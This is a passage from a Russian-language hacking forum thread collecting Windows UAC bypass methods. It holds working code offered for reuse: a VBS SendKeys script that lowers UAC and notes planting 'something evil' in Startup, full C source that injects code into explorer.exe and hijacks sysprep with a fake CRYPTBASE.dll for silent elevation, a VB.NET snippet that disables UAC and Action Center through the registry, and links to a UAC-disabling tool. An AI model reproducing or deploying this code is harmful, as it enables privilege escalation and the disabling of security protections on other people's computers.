FBE020000008B5C240801F78D2C32894C240483C6013974240476180FB64F0183C701884C24180FB64D0183C501384C241874DF8D4EFE83C20183F906895C2408765083E90783EE018B7C2408884801C1EF0883EF2089FB881883C002E937FEFFFF0FB6770889F33A5A08740FBE07000000C6442418C0E90AFEFFFF0FB6770989F33A5A09741BBE0800000031C983C201EBB6C1E10583EE01884C2418E9E7FDFFFF0FB6770A89F33A5A0A7413BE09000000B901000000EBD531F6E94BFEFFFF0FB6770B'
            $Opcode &= '89F33A5A0B740CBE0A000000B902000000EBB70FB6770C89F33A5A0C740CBE0B000000B903000000EBA00FB6770D89F33A5A0D740CBE0C000000B904000000EB890FB6770E89F33A5A0E740FBE0D000000B905000000E96FFFFFFF0FB6770F89F33A5A0F740FBE0E000000B906000000E955FFFFFF0FB6771089F33A5A10740FBE0F000000B907000000E93BFFFFFF0FB6771189F33A5A11740FBE10000000B908000000E921FFFFFF0FB6771289F33A5A12740FBE11000000B909000000E907FFFFFFBE12000000E975FEFFFF5557565383EC048B5424188B44241C8B4C2420034C24248B7C242001D0890C24EB1C8D4E018D1C0F391C2472778D1C0A39D8727089D6F3A489F239C273460FB63283C20183FE1F76D939D0765789F1C1E90583F907743B83C1020FB61A8D2C0F392C24723F83E61F0FB6DBC1E608F7D68D343729DE39742420772983C201F3A439C272BA89F82B44242083C4045B5E5F5DC30FB60A83C20139D076080FB6C983C107EBB383C40431C05B5E5F5DC3'
        EndIf
        $_LZF_Compress = (StringInStr($Opcode, "89C0") - 3) / 2
        $_LZF_Decompress = (StringInStr($Opcode, "89DB") - 3) / 2
        $Opcode = Binary($Opcode)

        $_LZF_CodeBufferMemory = _MemVirtualAlloc(0, BinaryLen($Opcode), $MEM_COMMIT, $PAGE_EXECUTE_READWRITE)
        $_LZF_CodeBuffer = DllStructCreate("byte[" & BinaryLen($Opcode) & "]", $_LZF_CodeBufferMemory)
        DllStructSetData($_LZF_CodeBuffer, 1, $Opcode)
        OnAutoItExitRegister("_LZF_Exit")
    EndIf
EndFunc   ;==>_LZF_Startup


Func _LZF_Decompress_Core($Data, $MaxBuffer)
    If Not IsDllStruct($_LZF_CodeBuffer) Then _LZF_Startup()

    $Data = Binary($Data)
    Local $InputLen = BinaryLen($Data)
    Local $Input = DllStructCreate("byte[" & $InputLen & "]")
    DllStructSetData($Input, 1, $Data)

    Local $Output = DllStructCreate("byte[" & $MaxBuffer & "]")

    Local $Var = DllStructCreate("ptr src; ptr dst")
    DllStructSetData($Var, "src", DllStructGetPtr($Input))
    DllStructSetData($Var, "dst", DllStructGetPtr($Output))

    Local $Ret = DllCall("user32.dll", "uint", "CallWindowProc", "ptr", DllStructGetPtr($_LZF_CodeBuffer) + $_LZF_Decompress, _
            "ptr", DllStructGetPtr($Var), _
            "uint", $InputLen, _
            "uint", $MaxBuffer, _
            "int", 0)

    Return BinaryMid(DllStructGetData($Output, 1), 1, $Ret[0])
EndFunc   ;==>_LZF_Decompress_Core


Func _LZF_Decompress($Data)
    If Not IsDllStruct($_LZF_CodeBuffer) Then _LZF_Startup()

    $Data = Binary($Data)
    Local $OutputLen = Int(BinaryMid($Data, 1, 4))
    Return _LZF_Decompress_Core(BinaryMid($Data, 5), $OutputLen)
EndFunc   ;==>_LZF_Decompress
Код:
Another way using .vbs
Set WshShell = WScript.CreateObject("WScript.Shell")

'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)

'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)

'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)

'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")

'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")

'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder

'// Reboot the system
'// WshShell.Run "shutdown /r /f"
Код:
UAC Bypass for Windows 7 RTM, SP1 / Windows 8 DP, CP all 32-bit for admin with default UAC settings

    Effectively bypasses the UAC rights, because of:
        1. "auto-elevation" for certain processes started from explorer.exe
        2. anyone can inject anything to explorer.exe

    This was reported to Microsoft multiple times (months ago) and they are too lame to fix injection to explorer.exe.
    I've followed the responsible disclosure guidelines, no need to get angry on me. TDL4 is using the bypass for 64-bit already.
   
    (C) 2012 K. Kleissner, Published under EUPL - Take it, use it.
   
    Implement it as below, be aware the code makes a copy of itself (the "own" exe) and changes it to be a dll (so be aware of the WinMain -> DllMain entry point implications!).


        int UACBypass();

        int main()
        {
            OSVERSIONINFO VersionInfo;
            VersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
            GetVersionEx(&VersionInfo);
   
            // Windows 7, 8: Try injecting into auto-elevated process if admin and UAC is on default (prompts 2 times on guest with credential UI so you should add a check for guest)
            if (VersionInfo.dwMajorVersion == 6 && (VersionInfo.dwMinorVersion == 1 || VersionInfo.dwMinorVersion == 2) && !IsUserElevatedAdmin())
                UACBypass();
           
            // ... your code here ...
        }

        BOOL IsUserElevatedAdmin()
        {
            SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
            PSID SecurityIdentifier;
            if (!AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &SecurityIdentifier))
                return 0;
       
            BOOL IsAdminMember;
            if (!CheckTokenMembership(NULL, SecurityIdentifier, &IsAdminMember))
                IsAdminMember = FALSE;
       
            FreeSid(SecurityIdentifier);
       
            return IsAdminMember;
        }
*/


// WARNING: This code leaves crytpbase.dll in sysprep directory!
// This is cleaned up and heavily modified code from originally http://www.pretentiousname.com/misc/win7_uac_whitelist2.html (Win7Elevate_Inject)

#define _HAS_EXCEPTIONS 0

#include <windows.h>
#include <commctrl.h>
#include <shlobj.h>
#include <psapi.h>


struct InjectArgs
{
    // Functions
    BOOL    (WINAPI *FFreeLibrary)(HMODULE hLibModule);
    HMODULE (WINAPI *FLoadLibrary)(LPCWSTR lpLibFileName);
    FARPROC (WINAPI *FGetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
    BOOL    (WINAPI *FCloseHandle)(HANDLE);
    DWORD   (WINAPI *FWaitForSingleObject)(HANDLE,DWORD);

    // Static strings
    wchar_t szSourceDll[MAX_PATH];
    wchar_t szElevDir[MAX_PATH];
    wchar_t szElevDll[MAX_PATH];
    wchar_t szElevDllFull[MAX_PATH];
    wchar_t szElevExeFull[MAX_PATH];
    wchar_t szElevArgs[MAX_PATH];
    wchar_t szEIFOMoniker[MAX_PATH]; // szElevatedIFileOperationMoniker

    // some GUIDs
    IID     pIID_EIFO;
    IID     pIID_ShellItem2;
    IID     pIID_Unknown;

    // Dll and import strings
    wchar_t NameShell32[20];
    wchar_t NameOle32[20];
    char    NameCoInitialize[20];
    char    NameCoUninitialize[20];
    char    NameCoGetObject[20];
    char    NameCoCreateInstance[20];
    char    NameSHCreateItemFromParsingName[30];
    char    NameShellExecuteExW[20];

    // IMPORTANT: Allocating structures here (so we know where it was allocated)
    SHELLEXECUTEINFO shinfo;
    BIND_OPTS3 bo;
};


// important: error code here is passed back to original process (1 = success, 0 = failure)

static DWORD WINAPI RemoteCodeFunc(InjectArgs * Args)
{
    // don't rely on any static data here as this function is copied alone into remote process! (we assume at least that kernel32 is at same address)
    NTSTATUS Status = 0;

    // Use an elevated FileOperation object to copy a file to a protected folder.
    // If we're in a process that can do silent COM elevation then we can do this without any prompts.

    HMODULE ModuleOle32    = Args->FLoadLibrary(Args->NameOle32);
    HMODULE ModuleShell32  = Args->FLoadLibrary(Args->NameShell32);

    if (!ModuleOle32 || !ModuleShell32)
        return 0;

    // Load the non-Kernel32.dll functions that we need.
    HRESULT (WINAPI * FCoInitialize)(LPVOID pvReserved) = (HRESULT (WINAPI * )(LPVOID pvReserved))Args->FGetProcAddress(ModuleOle32, Args->NameCoInitialize);
    void (WINAPI * FCoUninitialize)(void) = (void (WINAPI * )(void))Args->FGetProcAddress(ModuleOle32, Args->NameCoUninitialize);
    HRESULT (WINAPI * FCoGetObject)(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv) = (HRESULT (WINAPI * )(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv))Args->FGetProcAddress(ModuleOle32, Args->NameCoGetObject);
    HRESULT (WINAPI * FCoCreateInstance)(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, void ** ppv) = (HRESULT (WINAPI * )(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, void ** ppv))Args->FGetProcAddress(ModuleOle32, Args->NameCoCreateInstance);
    HRESULT (WINAPI * FSHCreateItemFromParsingName)(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv) = (HRESULT (WINAPI * )(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv))Args->FGetProcAddress(ModuleShell32, Args->NameSHCreateItemFromParsingName);
    BOOL (WINAPI * FShellExecuteEx)(LPSHELLEXECUTEINFOW lpExecInfo) = (BOOL (WINAPI * )(LPSHELLEXECUTEINFOW lpExecInfo))Args->FGetProcAddress(ModuleShell32, Args->NameShellExecuteExW);

    if (!FCoInitialize || !FCoUninitialize || !FCoGetObject || !FCoCreateInstance || !FSHCreateItemFromParsingName || !FShellExecuteEx ||
        FCoInitialize(NULL) != S_OK)
        return 0;

    Args->bo.cbStruct = sizeof(BIND_OPTS3);
    Args->bo.dwClassContext = CLSCTX_LOCAL_SERVER;

    // For testing other COM objects/methods, start here.
    IFileOperation *pFileOp = 0;
    IShellItem *pSHISource = 0;
    IShellItem *pSHIDestination = 0;
    IShellItem *pSHIDelete = 0;

    // This is a completely standard call to IFileOperation, if you ignore all the pArgs/func-pointer indirection.
    if (FCoGetObject(Args->szEIFOMoniker, &Args->bo, Args->pIID_EIFO, reinterpret_cast< void ** >(&pFileOp)) == S_OK &&
        pFileOp &&
        pFileOp->SetOperationFlags(FOF_NOCONFIRMATION|FOF_SILENT|FOFX_SHOWELEVATIONPROMPT|FOFX_NOCOPYHOOKS|FOFX_REQUIREELEVATION|FOF_NOERRORUI) == S_OK && // FOF_NOERRORUI is important here to not show error messages, copying fails on guest (takes wrong path)
        FSHCreateItemFromParsingName( Args->szSourceDll, NULL, Args->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHISource)) == S_OK &&
        pSHISource &&
        FSHCreateItemFromParsingName( Args->szElevDir, NULL, Args->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHIDestination)) == S_OK &&
        pSHIDestination &&
        pFileOp->CopyItem(pSHISource, pSHIDestination, Args->szElevDll, NULL) == S_OK &&
        pFileOp->PerformOperations() == S_OK)
    {
        // Use ShellExecuteEx to launch the "part 2" target process. Again, a completely standard API call.
        // (Note: Don't use CreateProcess as it seems not to do the auto-elevation stuff.)
       
        Args->shinfo.cbSize = sizeof(SHELLEXECUTEINFO);
        Args->shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
        Args->shinfo.lpFile = Args->szElevExeFull;
        Args->shinfo.lpParameters = Args->szElevArgs;
        Args->shinfo.lpDirectory = Args->szElevDir;
        Args->shinfo.nShow = SW_SHOW;
       
        // update: we assume the cryptbase.dll deletes itself (no waiting for syspreps execution although it would be possible)
        if ((Status = FShellExecuteEx(&Args->shinfo)))
        {
            Args->FCloseHandle(Args->shinfo.hProcess);
        }
    }

    // clean-up
    if (pSHIDelete)      { pSHIDelete->Release();      }
    if (pSHIDestination) { pSHIDestination->Release(); }
    if (pSHISource)      { pSHISource->Release();      }
    if (pFileOp)         { pFileOp->Release();         }

    FCoUninitialize();
    Args->FFreeLibrary(ModuleShell32);
    Args->FFreeLibrary(ModuleOle32);

    return Status;
}


// returns 1 when you can expect everything worked fine!

int AttemptOperation(bool bInject, HANDLE TargetProcess, const wchar_t *szPathToOurDll)
{
    NTSTATUS Status = 0;

    const BYTE * codeStartAdr = (BYTE *)RemoteCodeFunc;
    const BYTE * codeEndAdr   = (BYTE *)AttemptOperation;

    if (codeStartAdr >= codeEndAdr)     // ensure we don't copy crap
        return 0;

    // Here we define the target process and DLL for "part 2." This is an auto/silent-elevating process which isn't
    // directly below System32 and which loads a DLL which is directly below System32 but isn't on the OS's "Known DLLs" list.
    // If we copy our own DLL with the same name to the exe's folder then the exe will load our DLL instead of the real one.

    // set up arguments
    InjectArgs ia;
    memset(&ia, 0, sizeof(ia));

    ia.FFreeLibrary         = FreeLibrary;
    ia.FLoadLibrary         = LoadLibrary;
    ia.FGetProcAddress      = GetProcAddress;
    ia.FCloseHandle         = CloseHandle;
    ia.FWaitForSingleObject = WaitForSingleObject;

    wcscpy(ia.NameShell32,                      L"shell32.dll");
    wcscpy(ia.NameOle32,                        L"ole32.dll");
    strcpy(ia.NameCoInitialize,                 "CoInitialize");
    strcpy(ia.NameCoUninitialize,               "CoUninitialize");
    strcpy(ia.NameCoGetObject,                  "CoGetObject");
    strcpy(ia.NameCoCreateInstance,             "CoCreateInstance");
    strcpy(ia.NameSHCreateItemFromParsingName,  "SHCreateItemFromParsingName");
    strcpy(ia.NameShellExecuteExW,              "ShellExecuteExW");

    wchar_t SystemDirectory[MAX_PATH];
    if (!GetSystemDirectory(SystemDirectory, MAX_PATH))
        return 0;

    wcscpy(ia.szSourceDll,      szPathToOurDll);
    wcscpy(ia.szElevDir,        SystemDirectory);
    wcscat(ia.szElevDir,        L"\\sysprep");
    wcscpy(ia.szElevDll,        L"CRYPTBASE.dll");
    wcscpy(ia.szElevExeFull,    SystemDirectory);
    wcscat(ia.szElevExeFull,    L"\\sysprep\\sysprep.exe");
    wcscpy(ia.szEIFOMoniker,    L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}");

    memcpy(&ia.pIID_EIFO,        &__uuidof(IFileOperation), sizeof(GUID));
    memcpy(&ia.pIID_ShellItem2,  &__uuidof(IShellItem2), sizeof(GUID));
    memcpy(&ia.pIID_Unknown,     &__uuidof(IUnknown), sizeof(GUID));

    if (!bInject)
    {
        // Test code without remoting.
        // This should result in a UAC prompt, if UAC is on at all and we haven't been launched as admin.
        Status = RemoteCodeFunc(&ia);
    }
    else
    {
        // Test code with remoting.
        // At least as of RC1 build 7100, with the default OS settings, this will run the specified command
        // with elevation but without triggering a UAC prompt.

        void * RemoteArgs = VirtualAllocEx(TargetProcess, 0, sizeof(ia), MEM_COMMIT, PAGE_READWRITE);
        if (!RemoteArgs || !WriteProcessMemory(TargetProcess, RemoteArgs, &ia, sizeof(ia), NULL))
            return 0;

        void * RemoteCode = VirtualAllocEx(TargetProcess, 0, codeEndAdr - codeStartAdr, MEM_COMMIT, PAGE_EXECUTE_READ);
        if (!RemoteCode || !WriteProcessMemory(TargetProcess, RemoteCode, RemoteCodeFunc, codeEndAdr - codeStartAdr, NULL))
            return 0;

        HANDLE hRemoteThread = CreateRemoteThread(TargetProcess, NULL, 0, (LPTHREAD_START_ROUTINE)RemoteCode, RemoteArgs, 0, NULL);
        if (!hRemoteThread)
            return 0;

        // intelligent logit to wait for the execution and grabbing the exit code
        DWORD dwWaitRes = WaitForSingleObject(hRemoteThread, 40000);

        if (dwWaitRes == WAIT_OBJECT_0)
            GetExitCodeThread(hRemoteThread, (DWORD *)&Status);

        CloseHandle(hRemoteThread);
    }

    return Status;
}

int UACBypass()
{
    // Step 1: find explorer.exe process we can inject to (to-do: maybe using some other process?)
    DWORD Processes[1024], BytesReturned;

    if (!EnumProcesses(Processes, sizeof(Processes), &BytesReturned))
        return 0;
   
    HANDLE TargetProcess = NULL;

    for (unsigned i = 0; i < BytesReturned / 4; i++)
    {
        if (Processes[i] != 0)
        {
            TargetProcess = OpenProcess(/*PROCESS_QUERY_INFORMATION | PROCESS_VM_READ*/PROCESS_ALL_ACCESS, FALSE, Processes[i]);

            // Get the process name.
            if (TargetProcess)
            {
                HMODULE hMod;
                DWORD cbNeeded;
       
                if (EnumProcessModules(TargetProcess, &hMod, sizeof(hMod),  &cbNeeded) )
                {
                    wchar_t ProcessName[MAX_PATH];
                    GetModuleBaseName(TargetProcess, hMod, ProcessName,   sizeof(ProcessName)/sizeof(TCHAR) );
                   
                    if (_wcsicmp(ProcessName, L"explorer.exe") == 0)
                        break;
                }

                CloseHandle(TargetProcess);
                TargetProcess = NULL;
            }
        }
    }

    if (!TargetProcess)
        return 0;

    // Step 2: Creating fake cryptbase.dll that is this exe with the IMAGE_FILE_DLL flag set in PE header
    wchar_t SelfFileName[MAX_PATH];
    if (!GetModuleFileNameW(NULL, SelfFileName, MAX_PATH))
    {
        CloseHandle(TargetProcess);
        return 0;
    }

    wchar_t FakeCrytbase[MAX_PATH];
    GetTempPathW(MAX_PATH, FakeCrytbase);
    GetTempFileNameW(FakeCrytbase, L"tmp", 0, FakeCrytbase);
    if (!CopyFile(SelfFileName, FakeCrytbase, 0))
    {
        CloseHandle(TargetProcess);
        return 0;
    }

    HANDLE FakeFile = CreateFileW(FakeCrytbase, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (FakeFile == INVALID_HANDLE_VALUE)
    {
        CloseHandle(TargetProcess);
        return 0;
    }

    DWORD NumberOfBytesRead;
    BYTE ImageHeader[4096];
    if (!ReadFile(FakeFile, ImageHeader, 4096, &NumberOfBytesRead, NULL))
    {
        CloseHandle(TargetProcess);
        CloseHandle(FakeFile);
        return 0;
    }

    PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)ImageHeader;
    PIMAGE_NT_HEADERS old_header = (PIMAGE_NT_HEADERS)&((const unsigned char *)(ImageHeader))[dos_header->e_lfanew];

    // set the dll flag (IMAGE_FILE_DLL)
    old_header->FileHeader.Characteristics |= IMAGE_FILE_DLL;

    DWORD NumberOfBytesWritten;
    if (SetFilePointer(FakeFile, 0, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER ||
        !WriteFile(FakeFile, ImageHeader, 4096, &NumberOfBytesWritten, NULL))
    {
        CloseHandle(TargetProcess);
        CloseHandle(FakeFile);
        return 0;
    }

    CloseHandle(FakeFile);

    // Step 3: Using the exploit
    NTSTATUS Status = AttemptOperation(1, TargetProcess, FakeCrytbase);

    CloseHandle(TargetProcess);
    DeleteFile(FakeCrytbase);

    // exit if we can assume that the elevation worked correctly, and this executable was started with auto-elevated rights
    if (Status)
        ExitProcess(1);

    return 1;
}
 

Вложения

  • UACByPass.rar
    9.9 КБ · Просмотры: 62

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
[Vb.net]Kill UAC
Код:
If My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wscsvc", "Start", "") = 4 Then
                       MsgBox("Action Center Disabled")
               Else
                       My.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wscsvc", "Start", 4)
               End If
               If My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "") = 0 Then
                       MsgBox("UAC Disabled")
               Else
                       My.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", 0)
               End If
               Dim pProcess() As Process = System.Diagnostics.Process.GetProcessesByName("explorer")
               For Each p As Process In pProcess
                       p.Kill()
               Next
               Application.DoEvents()
               Process.Start("explorer.exe")
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Подсобрал в кучу некоторые наработки испанских кодеров для обхода или отключения UAC.
Что-то у меня не один из способов так и не заработал...

Вот единственное что работает:https://ru-sphere.ru/threads/obxod-uac-bypass-uac.1954/#post-99498

Всё остальное у меня не получилось обойти UAC !
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
У испанцев всё так,через раз работает)Да и кто будет нормальный способ обхода в паблик выкладывать..
Ну там три скрипта AutoIT, два vbs и два си, те которые на си используют ту-же технологию CRYPTBASE.dll что и в моём посте в делфи, однако после компиляции уак всё-равно работает...

Скрипты AutoIT создают какой-то файл FuckUAC в темпе и скрыто запускают его, толку тоже нет...

vbs тоже-самое толку никакого даже после принудительной перезагрузки...

Нафиг такие способы вообще они выкладывают, лучше-бы вообще ничего не выкладывали...

Ну-либо у меня руки кривые !Отдыхай!!!
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Вот тулза кстати рабочая хоть и старая отключает уак без уведомлений и не требует админских прав:https://ru-sphere.ru/threads/fak-uac.1635/
 
Верх Низ